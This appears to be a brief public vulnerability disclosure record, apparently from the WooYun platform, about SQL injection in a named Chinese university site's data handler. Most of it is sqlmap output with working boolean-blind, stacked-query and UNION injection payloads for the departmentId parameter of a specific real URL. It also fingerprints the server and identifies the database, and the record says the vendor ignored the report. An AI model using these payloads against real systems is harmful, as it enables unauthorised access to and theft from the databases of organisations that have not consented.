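2016-02-24: Details reported to the vendor; awaiting vendor handling
2016-02-29: The vendor actively chose to ignore the vulnerability; details disclosed to the public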
http://woodscience.csuft.edu.cn/test/Common/GetDataHandler.ashx?departmentId=20&key=GetProfessionComboboxJson
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: departmentId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: departmentId=20 AND 6267=6267&key=GetProfessionComboboxJson

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: departmentId=20;WAITFOR DELAY '0:0:5'--&key=GetProfessionComboboxJson

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: departmentId=20 UNION ALL SELECT 18,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(85)+CHAR(90)+CHAR(69)+CHAR(77)+CHAR(100)+CHAR(83)+CHAR(85)+CHAR(88)+CHAR(73)+CHAR(102)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(113)+CHAR(113),18-- &key=GetProfessionComboboxJson
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
Database: zdzxwdata
[114 tables]
Severity: No impact (ignored by vendor)
Ignored at: 2016-02-29 09:50
Vulnerability Rank: 4 (WooYun rating)